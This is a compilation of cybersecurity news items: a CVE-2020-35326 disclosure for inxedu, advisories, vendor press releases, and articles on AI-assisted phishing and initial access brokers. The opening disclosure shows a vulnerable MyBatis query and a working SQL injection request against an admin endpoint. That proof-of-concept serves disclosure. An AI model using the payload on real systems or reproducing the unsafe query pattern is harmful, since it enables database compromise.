SQL Injection vulnerability in file /inxedu/demo_inxedu_open/src/main/resources/mybatis/inxedu/website/WebsiteImagesMapper.xml in inxedu 2.0.6 via the id value.

/inxedu/demo\_inxedu\_open/src/main/resources/mybatis/inxedu/website/WebsiteImagesMapper.xml

    
    <delete id="deleteImages" parameterType="java.lang.String">
      DELETE FROM EDU_WEBSITE_IMAGES WHERE IMAGE_ID IN(${value})
    </delete>
    

    POST /admin/website/delImages HTTP/1.1
    Host: 127.0.0.1:82
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 54
    Origin: http://127.0.0.1:82
    Connection: close
    Referer: http://127.0.0.1:82/admin/website/imagesPage
    Cookie: admin-token=; JSESSIONID=51DA0B24124A0158F5809EEDD2F7F1E2; inxedulogin_sys_user_=inxedulogin_sys_user_1
    Upgrade-Insecure-Requests: 1
    
    imageId=320) or updatexml(1,concat(0x7e,(user())),0) #

CVE-2020-35326: SQL Injection-2 · Issue #I14DNJ · 因酷/inxedu - Gitee.com

From updating employee education and implementing stronger authentication protocols to monitoring corporate accounts and adopting a zero-trust model, companies can better prepare defenses against chatbot-augmented attacks.

Over LinkedIn, Slack, Twitter, email, and text messages, people are sharing examples created using ChatGPT, the new artificial intelligence (AI) model from the team behind OpenAI.

Using ChatGPT, you can produce authentic-sounding dialogue that can be used for almost anything — from answering follow-up questions in an online chat dialogue to writing poetry. There are plenty of opportunities for enterprises to take advantage of the new chatbot technology, including helping with enterprise support and customer interactions. Its ability to quickly generate content, and, according to its developers, "answer follow-up questions, admit its mistakes, challenge incorrect premises, and reject inappropriate requests," opens many opportunities and some new challenges.

AI and machine learning (ML) is shifting quickly from niche solutions in corporate scenarios that have been high cost/high reward toward solutions to more expansive implementations that can solve a range of enterprise challenges, particularly those which focus on end users. Cybersecurity, for example, is now embracing AI-based approaches to provide greater protection with smaller security teams. One example highlights how organizations can use AI/ML to perform dynamic, risk-based checks when someone tries to access sensitive applications or data. This replaces older, policy-based approaches, which can take significant time and human interaction to develop and maintain the individual access policies. In a larger company, maintaining those policies could include hundreds or even thousands of applications and data repositories.

**Using AI for Greater Efficiency**

Interest in AI is continuing to explode as modern attacks require rapid detection and response to anomalous user behavior — something an AI model can be trained to quickly identify, but which takes significant human power to try and replicate manually. The goal of AI is to increase efficiency and trust while reducing friction and improving the user interface for typical users. Self-driving cars, for example, are designed to increase the safety and security of end users. In cybersecurity, specifically in the authentication of users (human and nonhuman), AI-based approaches are advancing rapidly, working with rule-based systems to improve the experience for end users.

In an increasingly digital world, attackers can already sidestep detection of binary identity authentication, including location, device, network, and other checks. Inevitably, cybercriminals will also look at the new opportunities ChatGPT opens up. AI tools that interact in a conversational way can be leveraged by cybercriminals to launch convincing phishing campaigns or account takeovers. In the past, it may have been easier to spot a phishing attack due to the poor grammar, unusual phrasing, or frequent spelling errors so common in phishing emails. That is quickly evolving with solutions like ChatGPT, which use natural language processing to create the initial message and then generate realistic responses to a target user's questions without any of those telltale markers.

**Rethink Security Approaches**

To prepare for chatbot-augmented attacks, organizations need to rethink security approaches to mitigate potential threats. Five measures they can take include:

1.  **Updating employee education** regarding the risks of phishing. Employees who understand how ChatGPT can be leveraged are likely to be more cautious about interacting with chatbots and other AI-supported solutions, and thereby avoid falling victim to these types of attacks.
2.  **Implementing strong authentication protocols** to make it more difficult for attackers to gain access to accounts. Attackers already know how to take advantage of users tired of reauthenticating through multifactor authentication (MFA) tools, so leveraging AI/ML to authenticate users through digital fingerprint matching and avoiding passwords altogether can help increase security while reducing MFA fatigue.
3.  **Adopting a zero-trust model.** By only granting access after verification and ensuring least-privileged access, security leaders can create an environment where even if an attacker leverages ChatGPT to get around unsuspecting users, the cybercriminals will still have to verify their identity and, even then, will only have access to limited resources. Limiting the access not only of developers but also leadership, including technical leadership, to the least access needed to perform their jobs effectively, may initially meet with resistance, but will make it harder for an attacker to leverage any unauthorized access for gain.
4.  **Monitoring activity** on corporate accounts and using tools, including spam filters, behavioral analysis, and keyword filtering, to identify and block malicious messages. Your employees cannot fall victim to a phishing attack, no matter how sophisticated the language is, if they never see the message. Quarantining malicious messages based on the behavior and relationship of the correspondents rather than specific keywords is more likely to block malicious actors.
5.  **Leveraging AI.** Cyberattacks are already leveraging AI, and ChatGPT is just one more way that they will use it to gain access to your organization's environments. Organizations must take advantage of the capabilities offered by AI/ML to improve cybersecurity and respond faster to threats and potential breaches.

Account takeover via social engineering, leveraging passwords from data breaches, and phishing attacks will become more frequent and more successful — despite our best defenses — given that ChatGPT can provide authentic-sounding responses to target inquiries. By updating and adopting these five approaches, organizations can help to reduce the risks to themselves and their employees when chatbots and other AI tools are used for malicious purposes.

ChatGPT Opens New Opportunities for Cybercriminals: 5 Ways for Organizations to Get Ready

**NEW YORK****,** **Jan. 18, 2023** **/PRNewswire/ --** Abacus Group, the leading provider of hosted IT services and solutions to alternative investment firms, today announces that it has acquired two boutique cybersecurity consulting companies, Gotham Security and its parent company, GoVanguard, both of which have unparalleled track records of excellence in the cyber arena.

Gotham Security, as the new business will be known, will be a subsidiary of Abacus Group but continue to operate independently. The acquisition marks a milestone in Abacus Group's expansion from a security-focussed managed service provider (MSP) to a full-bodied managed security service provider (MSSP) with an extensive suite of industry-leading cybersecurity services and products.

The deal will see Gotham Security supercharge Abacus Group's existing services portfolio with a wide breadth of cybersecurity consulting expertise. Abacus Group will acquire a comprehensive set of information security capabilities to provide clients with real-world, actionable insight, including penetration testing, red teaming, tabletop exercises, risk and compliance gap assessments, and threat hunting services.

Complementing and aligning with Abacus Group's leading cybersecurity technology platform, Gotham Security's services will continue to be delivered by its team of industry trailblazers, comprised of cybersecurity leaders, researchers, educators, and creators. Gotham Security's dedicated leadership team will remain at the helm of the company, bringing their passion for elevated quality, insight, and cybersecurity awareness to both their own clients and customers of Abacus Group.  

Chris Grandi, CEO of Abacus Group, commented: "This acquisition is a natural next step in a long working relationship with Gotham Security, as the businesses have been valued resources to each other and our clients over the last decade. It's fantastic to now join forces and take further strides in our own expansion from MSP to MSSP. Abacus Group has always been committed to keeping our clients safe and secure, especially as the security and regulatory landscape continues to evolve in line with escalating cyber threats. Therefore, we are thrilled to be able to expand our cybersecurity capabilities and provide the full suite of services offered by Gotham Security to our customers and investors."

The synergy between Abacus Group's cybersecurity offerings and Gotham Security will result in a complete set of MSSP capabilities. Expanding further into the MSSP space will support Abacus Group in meeting the growing demand for comprehensive, expert-led cybersecurity insights at every level of an organization's technology stack, especially as security threats against businesses continue to increase and become ever more sophisticated.

Christian Scott, COO, CISO and Partner at Gotham Security, added: "This is a very exciting time for everyone at Gotham Security. Alongside the close, collaborative working relationship we've developed with Abacus Group over the years, our shared mission to provide a broader scope of high-quality cybersecurity and technology services to customers has been the key driving force behind our union under the same umbrella. We continue to take pride in the best-in-class security insight we provide to our customers, but we've also listened closely to their growing demand for integrated technology solutions that fulfil an entire spectrum of security needs and requirements. The complementary opportunities created by Abacus Group's robust technology solutions and Gotham Security's innovative cybersecurity services will provide greater value and more options than ever to our shared customer base."

Lowenstein Sandler LLP served as legal counsel to Abacus Group, while Szaferman, Lakind, Blumstein & Blader, PC. Served as legal counsel to GoVanguard and Gotham Security on the transaction.

**About Abacus Group**

Abacus Group is a leading provider of hosted IT solutions and services focused on helping alternative investment firms by providing an enterprise technology platform specifically designed for the unique needs of the financial services industry. The innovative and award-winning Abacus Cloud platform allows investment managers to source all technology needs as a service, offering the capacity to scale on demand to meet current and future cybersecurity, storage and compliance requirements. The company has offices in New York, NY; San Francisco, CA; Boston, MA; Dallas, TX; Greenwich, CT; Los Angeles, CA; Charlotte, NC; Miami, FL; and London, England. For more information, visit www.abacusgroupllc.com.

**About Gotham Security**

Gotham Security is a boutique cybersecurity firm founded in 2013 and based out of Manhattan, focused on providing high-quality penetration testing, malicious adversary simulation, threat intelligence services, and cybersecurity strategy services. Our team is comprised of elite white hat hackers, known as the go-to "cyber strike team." We are not just excellent at red teaming, more importantly, we know how to communicate cybersecurity threats in a practical way to organizations. We work with a growing number of Fortune 1000 companies across all major sectors of business, including multi-billion-dollar hedge funds, major insurance providers, international options trading exchanges, and more.

SOURCE Abacus Group LLC

Abacus Group Acquires Gotham Security and GoVanguard to Expand Cybersecurity Service Offerings

The integration provides crucial protection for businesses’ most vulnerable departments — help desks and customer support teams — preventing the most advanced threats sent by online users.

**(Tel Aviv, Israel – January 18, 2023) --** Perception Point, a leading provider of advanced threat protection across digital channels, today announced that it has launched _Advanced Threat Protection for Zendesk_, the champions of service-first CRM software, to provide unparalleled detection and remediation services for Zendesk customers. Perception Point customers can now protect Zendesk along with their email, web browsers and other cloud collaboration apps from a single, consolidated platform with the highest detection rates in the industry.

Helpdesk and customer support staff communicate regularly with people outside of the organization, making them especially vulnerable to external threats originating from malicious content within support tickets. Content uploaded externally can potentially be used as a vehicle for cyberattacks, allowing malicious payloads to enter an organization’s system.

Perception Point's _Advanced Threat Protection for Zendesk_, a multi-layered threat prevention platform, boosts Zendesk’s basic native security to protect customers from the most advanced malware and social engineering attacks. Easily deployed to protect all customer-facing personnel, Perception Point scans every single ticket attachment coming through Zendesk (including embedded URLs/files) in near real-time, using a combination of patented dynamic and static detection layers, based on threat intelligence, advanced algorithms and machine learning. Perception Point’s next-generation sandbox technology uniquely scans 100% of content, 40x faster than traditional technologies, to achieve unprecedented visibility into any type of attack, including advanced attacks like APTs and zero-days. Zendesk customers will be able to rapidly remediate any attack that slips through the cracks through the support of Perception Point’s free-of-charge 24/7 managed incident response service.

“The threat landscape is only becoming more complex, with threat actors initiating more advanced attacks across multiple attack vectors,” said Peleg Cabra, Product Marketing Manager, Perception Point. “Adding Zendesk integration to our Advanced Threat Protection platform allows Zendesk users to protect their organizations against malware and social engineering attacks that would otherwise avoid detection by traditional cyber defense mechanisms. The offering not only secures Zendesk’s support channels, but also reduces SOC team workloads through the support of Perception Point’s managed incident response service.”

_Advanced Threat Protection for Zendesk_ has already been successfully deployed by Agoda, an international hospitality company with over 7,000 employees worldwide, which uses Zendesk to process all customer requests. Over a three-month period, Perception Point’s solution scanned over 385,000 root files, scanned around 69,000 embedded files and URLs, identified and prevented 187 malicious events, and dynamically scanned all traffic at an average of 7.1 seconds, with 75% of content dynamically scanned in just three seconds.

“Perception Point has been instrumental in strengthening and fortifying both our organization and our Zendesk systems,” said Guy Fridman, Head of Security Operation and Response, Agoda. “Securing Zendesk is critical to the success of our customer relationships. Beyond future-proofing against potential threats, Perception Point also allows our SOC team to focus on other important security areas such as monitoring, testing, and analyzing our overall security posture. This combination of innovative technology and reliable client servicing has provided us with the confidence to operate with zero to little friction.”

Read more about the Zendesk case study with Agoda here.

Perception Point’s advanced threat protection solution is now available for Zendesk Support products. Read here for more information about protecting Zendesk.

**About Perception Point**

Perception Point is a Prevention-as-a-Service company for the fastest and most accurate next-generation detection and response to all attacks across email, cloud collaboration channels, and web browsers. The solution's natively integrated incident response service acts as a force multiplier to the SOC team, reducing management overhead, improving user experience and delivering continuous insights; providing proven best protection for all organizations.

Deployed in minutes, with no change to the enterprise’s infrastructure, the patented, cloud-native and easy-to-use service replaces cumbersome legacy systems to prevent phishing, BEC, spam, malware, Zero-days, ATO, and other advanced attacks well before they reach end-users. Fortune 500 enterprises and organizations across the globe are preventing content-borne attacks across their email and cloud collaboration channels with Perception Point.

To learn more about Perception Point, visit our website, or follow us on LinkedIn, Facebook, and Twitter.

Perception Point Launches Advanced Threat Protection and Rapid Remediation for Zendesk Customers

Range of Addressable Concerns Includes "Brute Forcing Accounts with Weak Passwords" and "Excessive File System Permissions."

**DENVER****,** **Jan. 18, 2023** **/PRNewswire/ --** Lares, a leader in global security assessment, testing, and coaching, today released new research highlighting the five most common penetration testing findings encountered by the firm's consultants over hundreds of client engagements in 2022.

Lares typically finds numerous vulnerabilities and attack vectors when conducting penetration tests or red team engagements for clients, regardless of the organization's size or maturity. However, the research team at Lares was surprised by how many times the same five findings kept turning up during their penetration tests and red team engagements in early 2022.

"As we wrapped up 2022, our surprise gave way to expectation, and we found ourselves genuinely surprised if one, or all, of the top five issues were not found on any given engagement," said Andrew Hay, Chief Operating Officer of Lares. "Every single vulnerability described in our latest research paper can be avoided or eliminated through better cybersecurity hygiene practices."

The Lares research team emphasized that these Top 5 findings were not the most severe threats for clients, but rather, the ones they most frequently encountered during engagements over the past year. Key takeaways describing each category include:

**Brute Forcing Accounts with Weak and Guessable Passwords:** Organizations that have not implemented multifactor authentication (MFA) should be aware that adversaries may target accounts where users have selected weak or guessable passwords to gain access to systems, services, and network resources. If authentication failures are high, there may be a brute-force attempt to gain access to a system using legitimate credentials.

**Kerberroasting:** Kerberos Service Principal Names (SPNs) uniquely identify each instance of a Windows service configured to accept Kerberos Tickets for authentication. Adversaries possessing a valid Kerberos Ticket-Granting Ticket (TGT) may request one or more Kerberos Ticket-Granting Server (TGS) Service Tickets for any service with an SPN configured from a Key Distribution Server – typically the Domain Controller (DC) in Windows Active Directory. This Service Ticket is then brute-forced offline to recover the plain-text credentials of the account.

**Excessive File System Permissions:** Improperly set permissions on the binary or directory in which it resides may allow attackers to replace the legitimate binary with a file of their choosing. Adversaries may use this technique to replace legitimate pre-existing binaries or dynamic-link libraries (DLLs) with malicious ones to execute subversive or potentially disruptive code with a much higher permission level than their current user permissions.

**WannaCry/EternalBlue:** Remote code execution vulnerabilities exist in the Microsoft Server Message Block 1.0 (SMBv1) server that handles certain requests. An attacker who successfully exploits the vulnerabilities could gain the ability to execute code on the target server. The EternalBlue and EternalRomance exploits were leaked by "The Shadow Brokers" group in 2017. The EternalBlue exploit was also leveraged by WannaCry ransomware to compromise Windows machines, load malware, and propagate to other machines in a network.

**WMI (Windows Management Instrumentation) Lateral Movement:** Lateral movement is a critical phase in any attack targeting more than a single computer. It is not a vulnerability, but a technique employed by attackers to interact with or gain access to a system other than the current system upon which they are operating. The WMI allows for a structured approach to communicating with a remote computer and exposes system monitoring and configuration capabilities to a remote machine. An adversary can use this native functionality to execute malicious code, modify system settings such as adding a user or password or disabling security tools before performing other activities.

The Lares Top 5 Penetration Test Findings in 2022 research paper is available for download here: https://www.lares.com/lares-top-5-penetration-test-findings-report/.

Lares has scheduled a webinar on Thursday, January 26, at 10 a.m. (PT)/1 p.m. (ET), to discuss these white paper findings in greater detail. To sign up or get more information about the webinar, please click here: https://attendee.gotowebinar.com/register/4185409087390473815.

**About Lares, LLC**

Lares is a security consulting firm that helps companies secure electronic, physical, intellectual, and financial assets through a unique blend of assessment, testing, and coaching since 2008. For more information, visit lares.com, contact us at (720) 600-0329, or follow Lares on Twitter @Lares\_.

Lares Research Highlights Top 5 Penetration Test Findings From 2022

Dell EMC Metro node, Version(s) prior to 7.1, contain a Code Injection Vulnerability. An authenticated nonprivileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application.

SUSE SLES 15-SP3 CVE-2019-19536,CVE-2019-19534, CVE-2019-14901,CVE-2019-15916 CVE-2019-18809,CVE-2019-0154,CVE-2019-18805,CVE-2019-19081,CVE-2019-19080,CVE-2019-19083,CVE-2019-19060,CVE-2019-19082,CVE-2019-19067,CVE-2019-16231,CVE-2019-19046,CVE-2019-19068,CVE-2019-19063,CVE-2019-19062,CVE-2019-19065,CVE-2019-19525,CVE-2019-19528,CVE-2019-19049,CVE-2019-19543,CVE-2019-14895,CVE-2019-19227,CVE-2019-19524,CVE-2019-19529,CVE-2019-18660,CVE-2019-19056,CVE-2019-19078,CVE-2019-19077,CVE-2019-17055,CVE-2019-19058,CVE-2019-19531,CVE-2019-18683,CVE-2019-19057,CVE-2019-19530,CVE-2019-19052,CVE-2019-19074,CVE-2019-19073,CVE-2019-19075,CVE-2021-20233,CVE-2020-27779,CVE-2020-25632,CVE-2020-14372,CVE-2020-25647,CVE-2020-27749,CVE-2021-20225,CVE-2019-25013,CVE-2020-29562,CVE-2020-29573,CVE-2021-3326,CVE-2020-27618,CVE-2021-3144, CVE-2021-25281,CVE-2020-35662,CVE-2021-3197,CVE-2020-28972, CVE-2021-25283,CVE-2021-25282,CVE-2021-3148,CVE-2021-25284, CVE-2020-28243,CVE-2019-18348,CVE-2020-8492,CVE-2019-5010, CVE-2020-14422,CVE-2020-26116,CVE-2019-20907,CVE-2019-16935,CVE-2020-27619,CVE-2021-4034,CVE-2020-7217,CVE-2019-18903, CVE-2020-8231,CVE-2019-8696,CVE-2019-8675,CVE-2019-18218,CVE-2020-10543,CVE-2020-12723,CVE-2020-10878,CVE-2020-11652,CVE-2020-11651,CVE-2020-8023,CVE-2017-8871,CVE-2017-8834,CVE-2019-20812,CVE-2019-9455,CVE-2020-10711,CVE-2020-12659,CVE-2020-12769,CVE-2020-12768,CVE-2020-10720,CVE-2020-12657,CVE-2020-10732,CVE-2020-12656,CVE-2020-10757,CVE-2020-12464,CVE-2020-10690,CVE-2018-1000199,CVE-2020-10751,CVE-2020-12655,CVE-2020-13143,CVE-2020-12654,CVE-2020-0543,CVE-2020-12114,CVE-2020-12653,CVE-2020-12652,CVE-2019-19462,CVE-2019-20806,CVE-2018-18751,CVE-2020-14314,CVE-2020-10135,CVE-2020-14331,CVE-2020-14386,CVE-2020-14356,CVE-2020-16166,CVE-2020-24394,CVE-2020-1749,CVE-2020-14310,CVE-2020-14311,CVE-2020-15707,CVE-2020-10713,CVE-2020-14308,CVE-2020-15706,CVE-2020-14309,CVE-2019-18897,CVE-2019-17361,CVE-2019-9674,CVE-2020-8492,CVE-2019-20810,CVE-2020-10766,CVE-2020-10767,CVE-2020-12888,CVE-2019-16746,CVE-2020-14416,CVE-2020-10768,CVE-2020-10769,CVE-2020-10781,CVE-2020-12771,CVE-2020-0305,CVE-2020-13974,CVE-2020-10773,CVE-2019-20908,CVE-2020-15780,CVE-2020-15393,CVE-2020-7216,CVE-2019-18902,CVE-2020-3898,CVE-2020-8177,CVE-2019-12900,CVE-2016-3189,CVE-2021-39537,CVE-2021-33503,CVE-2021-3695,CVE-2021-3696,CVE-2021-3697,CVE-2021-3981,CVE-2022-28733,CVE-2022-28734,CVE-2022-28735,CVE-2022-28736,CVE-2022-28737,CVE-2019-10160,CVE-2018-20852,CVE-2011-3389,CVE-2019-9947,CVE-2016-0772,CVE-2012-0845,CVE-2013-4238,CVE-2018-14647,CVE-2014-4650,CVE-2018-1000802,CVE-2012-1150,CVE-2019-16056,CVE-2011-4944,CVE-2019-5010,CVE-2018-20406,CVE-2019-15903,CVE-2019-9636,CVE-2018-1061,CVE-2018-1060,CVE-2014-2667,CVE-2019-16935,CVE-2016-1000110,CVE-2013-1752,CVE-2016-5699,CVE-2016-5636,CVE-2017-18207,CVE-2019-15213,CVE-2019-19537,CVE-2019-19338,CVE-2019-19319,CVE-2020-7053,CVE-2019-19318,CVE-2019-19533,CVE-2019-19532,CVE-2019-19535,CVE-2019-18808,CVE-2020-8648,CVE-2019-16746,CVE-2020-8428,CVE-2019-19045,CVE-2019-19066,CVE-2019-19526,CVE-2019-19966,CVE-2020-8992,CVE-2019-19767,CVE-2019-19965,CVE-2019-19527,CVE-2019-14897,CVE-2019-14896,CVE-2019-19447,CVE-2019-16994,CVE-2019-19523,CVE-2019-14615,CVE-2019-20054,CVE-2019-20096,CVE-2019-20095,CVE-2019-19927,CVE-2020-2732,CVE-2019-19036,CVE-2019-19332,CVE-2019-19051,CVE-2019-19054,CVE-2020-25212,CVE-2020-25641,CVE-2020-0404,CVE-2020-0427,CVE-2019-25643,CVE-2020-0431,CVE-2020-0432,CVE-2020-25643,CVE-2020-14390,CVE-2020-26088,CVE-2020-25284,CVE-2020-14381  
  See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Dell BIOS FW CVE-2020-0587,CVE-2020-0588,CVE-2020-0590,CVE-2020-0591  
CVE-2020-0592,CVE-2020-0593 

CVE-2020-8705,CVE-2020-8755

CVE-2020-8696

CVE-2020-8695,CVE-2020-8694

CVE-2020-8674,CVE-2020-8738,CVE-2020-8739,CVE-2020-8740 

CVE-2020-8673

CVE-2021-0060

CVE-2021-0127

CVE-2021-0103,CVE-2021-0114,CVE-2021-0115,CVE-2021-0116,CVE-2021-0117,CVE-2021-0118,CVE-2021-0099,CVE-2021-0111,CVE-2021-0107,CVE-2021-0125,CVE-2021-0124,CVE-2021-0092,CVE-2021-0093

  CVE-2020-12358,CVE-2020-12360, CVE-2020-24486,CVE-2021-0095,  
CVE-2020-12359,CVE-2020-8670,CVE-2020-12357

CVE-2020-24511,CVE-2020-24512

CVE-2020-24506,CVE-2020-24507,CVE-2020-8703

CVE-2019-14553

INTEL-SA-00358

INTEL-SA-00391

INTEL-SA-00381

INTEL-SA-00389

INTEL-SA-00390

INTEL-SA-00470  
INTEL-SA-00532

INTEL-SA-00527

INTEL-SA-00463

  INTEL-SA-00464  

INTEL-SA-00459

CVE-2022-34456: DSA-2022-267: Dell EMC Metronode VS5 Security Update for Multiple Third-Party Component Vulnerabilities

Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections).  Supported versions that are affected are 12.1 and  12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Management.  Successful attacks of this vulnerability can result in  unauthorized creation, deletion or modification access to critical data or all Oracle Demantra Demand Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).

CVE-2023-21850: Oracle Critical Patch Update Advisory - January 2023

A rapid increase in the number of operators in the space — the "locksmiths" of the cyber underground — has made it substantially cheaper for cybercriminals to buy access to target networks.

Names such as Novelli, orangecake, Pirat-Networks, SubComandanteVPN, and zirochka are unlikely to mean anything to a vast majority of enterprise security teams. But for ransomware operators and other cybercriminals looking for quick access to enterprise networks, these were _the_ brokers to approach for a major portion of last year.

Between them, the five entities accounted for some 25% of all access offers to enterprise networks that were available for sale on underground forums between the second half of 2021 and the first half of 2022. For an average price of around $2,800, these so-called initial access brokers (IABs) sold stolen VPN and remote desktop protocol (RDP) account details and other credentials that criminals could use to break into the networks of more than 2,300 organizations around the world, without breaking a sweat.

**A Vast & Growing Marketplace**

The five operators were the leaders in a much bigger and fast-growing market of hundreds of other similar IABs that security firm Group-IB discovered when conducting research for its 11th annual report on high-tech crime, released this week.

The company's research showed a sharp year-over-year growth in the number of IABs operating in underground forums and markets — from 262 in the immediately preceding 12-month period to 380 in the period between the second half of 2021 and the first half of 2022. Some 327 of the IABs that Group-IB observed operating during that period were new entries in the space.

Group-IB researchers also uncovered a 41% increase in the number of countries to which compromised entities belonged — from 68 a year earlier to 96 over the period of its study. Nearly a quarter — 24% — of all initial access offers involved the networks of US-based organizations. Other countries with a relatively high number of victims included Brazil, Canada, France, and the UK.

"As access sales continue to grow and diversify, IABs are one of the top threats to watch in 2023," warned Dmitry Volkov, CEO of Group-IB, in a statement accompanying the new report.

"Initial access brokers play the role of oil producers for the whole underground economy," he noted. "They fuel and facilitate the operations of other criminals, such as ransomware and nation-state adversaries."

**"Opportunistic Locksmiths of the Security World"**

The value proposition of IABs in the cybercrime economy is that they give other cybercriminals a way to gain an easy foothold on a target network without their having to do any legwork upfront. IABs do the technical work of breaking into a network and stealing credentials — such as those associated with VPNs, RDP services, Active Directory, and remote management panels — that provide subsequent access to it. Often, they can drop Web shells on a compromised network to ensure persistent future access to it and then sell the Web shells. In a report last year, researchers from Google's Threat Analysis Group described IABs as the "opportunistic locksmiths of the security world" who specialize in breaching a target and offering access to it to the highest bidder.

**Fueling the Ransomware Economy**

IABs offer their wares to anyone willing to purchase them, and the market for their services has grown rapidly over the past two years or so. But their biggest customers of late have been ransomware operators. 

A new study by threat intelligence firm KELA showed that several major ransomware attacks involving groups such as Hive, Sodinokibi, BlackByte, and Quantum started with network access from an IAB. In one instance, members of the Conti ransomware group joined an IAB to target organizations in Ukraine. 

"The most notable incident was related to the attack on Medibank, an Australian insurance provider, which was attacked after network access to the company was sold on a private Telegram channel," KELA said.

Group-IB's researchers found that 70% of the access types that IABs offered were RDP and VPN account details. Many of the offers — 47% — involved access with administrator rights on the compromised network. Twenty-eight percent of advertisements in which rights were specified involved domain administration rights, 23% had standard use rights, and a small fraction provided root account access. 

Group-IB researchers also found IAB advertisements for access to Citrix environments, multiple Web panels for CMS and cloud servers, and Web shells on compromised systems. In some instances, IABs even offered to launch lateral-movement payloads such as Cobalt Strike Beacon or Metasploit sessions on behalf of the buyer. But offers for these credentials and services tended to be less common than those involving RDP and VPN credentials.

Organizations for which access offers were most commonly available in underground forums and marketplaces included manufacturing companies, financial services firms, real estate organizations, education, and information technology firms.

Group-IB found that the sharp increase in the number of entities operating in the IAB space during the period of its study had pushed prices down for most categories of initial access. 

The average price of $2,800 that the company observed was, in fact, less than half of the $6,500 that IABs used to charge on average for the same access a year previously.

Initial Access Broker Market Booms, Posing Growing Threat to Enterprises

VIPRE Endpoint Detection & Response (EDR) delivers streamlined, sophisticated, high-performing cloud-based EDR management in a single, easy-to-navigate console.

**NEW YORK****,** **Jan. 17, 2023** **/PRNewswire/ --** VIPRE Security Group, an industry-leader and award-winning global cybersecurity, privacy, data, and user protection company, announced today the launch of its latest cybersecurity solution – VIPRE Endpoint Detection & Response (EDR). VIPRE EDR is designed to help small- and medium-sized enterprises and the IT partners that serve them to navigate the complexities of EDR management from a single, easy-to-use console.

VIPRE EDR delivers the sophistication of a high-performing, cloud-based solution without the challenges that users might expect from an EDR solution. This advanced technology provides better detection and discovery of more anomalous behavior than users would receive from standalone antivirus file, process, and networking analysis solutions while also providing investigation and remediation tools to speed response times.

The VIPRE EDR solution revolves around the core tenets of Detection, Investigation, Containment and Remediation — turning threats into intelligence and recommending next steps for security professionals as simply identifying a threat is not enough.

**Benefits of VIPRE's Endpoint Detection and Response**

*   **EPP/Next-generation Antivirus:** With VIPRE Endpoint Cloud as its core, VIPRE EDR constantly scans files, processes, and network activity for known and unknown threats and instantly alerts you to suspicious behaviors.
*   **Exploit prevention:** Proactively blocks network threats with built in DNS protection, intrusion protection, and in-browser exploit prevention.
*   **Correlated Behavior Engine:** Peer deeper into endpoint behavior to track emerging or suspicious activity correlated across all engines. Potential threats are surfaced to the cloud console with full detailed telemetry of all related activity for further analysis.
*   **Endpoint Isolation:** Prevent threat spread by quickly isolating an affected device on the network. Only admins are able to manage and interact with the device remotely until the investigation is complete.
*   **Threat Incident Visualization:** Quickly view and address all threat behavior from a central location. Understand how and when a potential threat impacted systems, includes all aspects of endpoint activity related to the threat – all user, process, file, and network activity.
*   **Remote Shell:** For an even deeper look at what happened on the endpoint, VIPRE EDR allows click-button reporting that gives administrators instant access to the remote device – no special installation required.
*   **Suspicious file/link sandboxing:** Integrated ability to detonate files and links in a private cloud sandbox for deep analysis and forensic investigation.
*   **Integrated Vulnerability Management:** Close potential security holes with integrated app scanning and vulnerability management.

**VIPRE EDR: Decoding EDR for SMEs**

"VIPRE Security Group understands that many of today's EDR solutions are far too complex for the average business without a large, experienced IT staff, which is why VIPRE EDR is easy to use and resource sensitive — keeping organizations protected yet not overwhelmed with alert fatigue," said VIPRE's chief product officer Usman Choudhary.

Built on the core of VIPRE's top-ranked Endpoint Security Cloud EPP platform, protection begins with comprehensive monitoring and automated blocking of malicious activity across all file, process, and network activity on the endpoint. This protection includes monitoring for DNS, web, and network exploits, plus AI-driven malicious process behavior detection.

The solution allows users to peer deeper into endpoint behavior to track emerging or suspicious activity correlated across all engines. Potential threats are surfaced to the VIPRE EDR cloud console with detailed telemetry of all related activity for further analysis for root cause, entry point, and remediation.

Additionally, the solution provides endpoint isolation to prevent any threat from spreading by quickly isolating an affected device on the network. Only role-based members can manage and interact with the device until an investigation is complete and impacted systems, including all aspects of endpoint activity related to the threat, are remediated.

The VIPRE EDR solution also includes a robust incident management portal that efficiently tracks all open threats. Once identified, threats can be investigated to determine root cause, spread, and indicators of compromise (IOC) so that mitigation, remediation, and hardening can be performed through integrated tooling.

"Most EDR solutions are massively complex and can be overwhelming for small and mid-sized businesses with limited IT resources," Choudhary said. "After taking stock of the market and seeing where other EDR solutions were not meeting the needs of our customers, we created VIPRE EDR to meet their unmet needs."

For nearly 30 years, VIPRE Security Group's primary goal has been providing simple solutions to protect against online threats, both existing and emerging, in an ever-expanding, digitally connected world. VIPRE protects more than 20 million endpoints, processes more than 1.2 billion emails, and serves more than 50,000 customers each month.

Learn more about VIPRE EDR by visiting the VIPRE website.

**About VIPRE Security Group**

VIPRE Security Group, part of Ziff Davis, Inc., is an award-winning global cybersecurity, privacy, and data protection company. Highly rated by our customers and partners, we protect millions of consumers and businesses worldwide. VIPRE specializes in emulating our namesake by swiftly striking down emerging threats.

With a rich history dating back nearly 30 years, VIPRE Security Group has defended consumers from online security threats since the internet was in its infancy. Today, VIPRE delivers unmatched protection against even the most aggressive online threats. We use cutting-edge machine learning, real-time behavior monitoring, and one of the world's largest threat intelligence clouds to protect what matters. Team members are located in 11 countries, with customers in nearly every nation worldwide.

VIPRE Security Group Launches New Endpoint Detection and Response (EDR) Technology Built for SMEs

Open source AI is lowering the barrier of entry for cybercriminals. Security teams must consider the right way to apply defensive AI to counter this threat.

In the wake of increasing concern about threat actors using open source AI tools like ChatGPT to launch sophisticated cyberattacks at scale, it's time for us to reconsider how AI is being leveraged on the defensive side to fend off these threats.

